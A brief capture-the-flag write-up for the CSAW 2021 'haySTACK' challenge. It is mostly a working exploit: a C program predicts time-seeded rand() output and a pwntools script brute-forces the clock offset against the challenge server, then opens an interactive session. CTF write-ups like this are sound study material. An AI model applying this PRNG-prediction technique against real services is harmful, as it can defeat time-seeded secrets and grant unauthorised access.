Initialize PRNG with time of my machine, bruteforcing offset between my machine and time of the server.

C program to generate numbers:
```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(int argc, char **argv) {
int offset = atoi(argv[1]);
time_t t = time(NULL);
for(int i=0;i<3;++i) {
srand(t + offset + i);
printf("%d ", rand() % 0x100000 & 0xffffffff);
}
puts("\n");
return 0;
}
```

Exploit:

```python
from pwn import *
import os

for OFFSET in range(-10,10,3):

values = os.popen("./rand {}".format(OFFSET)).read()
sh = remote("pwn.chal.csaw.io", 5002)

values = values.strip().split(" ")
print(values)

for v in values:
sh.recvuntil("check?")
sh.sendline(v)
sh.recvuntil("Hey")
answer = "Hey" + sh.recvline().decode()
print(answer)
if "That's it" in answer:
sh.interactive()
```

Original writeup (https://github.com/apoirrier/CTFs-writeups/blob/master/CSAWQual2021/pwn/haySTACK.md).